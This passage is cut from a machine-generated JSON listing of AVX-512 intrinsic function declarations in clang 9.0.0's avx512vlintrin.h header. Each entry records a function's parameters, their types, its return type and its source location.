"tag": "function", "name": "_mm256_mask_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6296:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6304:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6312:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6320:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6328:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6336:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6344:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6352:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6360:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6368:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6376:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6384:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6392:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6408:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6416:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6424:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6432:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6440:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6454:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6462:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6468:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6476:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6484:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__imm", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__imm", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6498:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__imm", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6506:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__imm", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6512:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__imm", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6520:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__imm", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6708:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6716:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6725:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6734:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_rsqrt14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6742:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6751:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6760:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6768:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6777:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6786:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_rsqrt14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6794:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_broadcast_f32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6803:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_broadcast_f32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6810:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_broadcast_f32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6818:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_broadcast_i32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6826:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_broadcast_i32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6833:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcast_i32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6841:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6849:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6857:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6865:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6873:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6881:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6889:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6897:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6905:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6921:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6929:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6937:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6945:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6953:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6961:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6969:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6976:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvtsepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6984:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6990:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6998:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7005:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtsepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:7013:1", 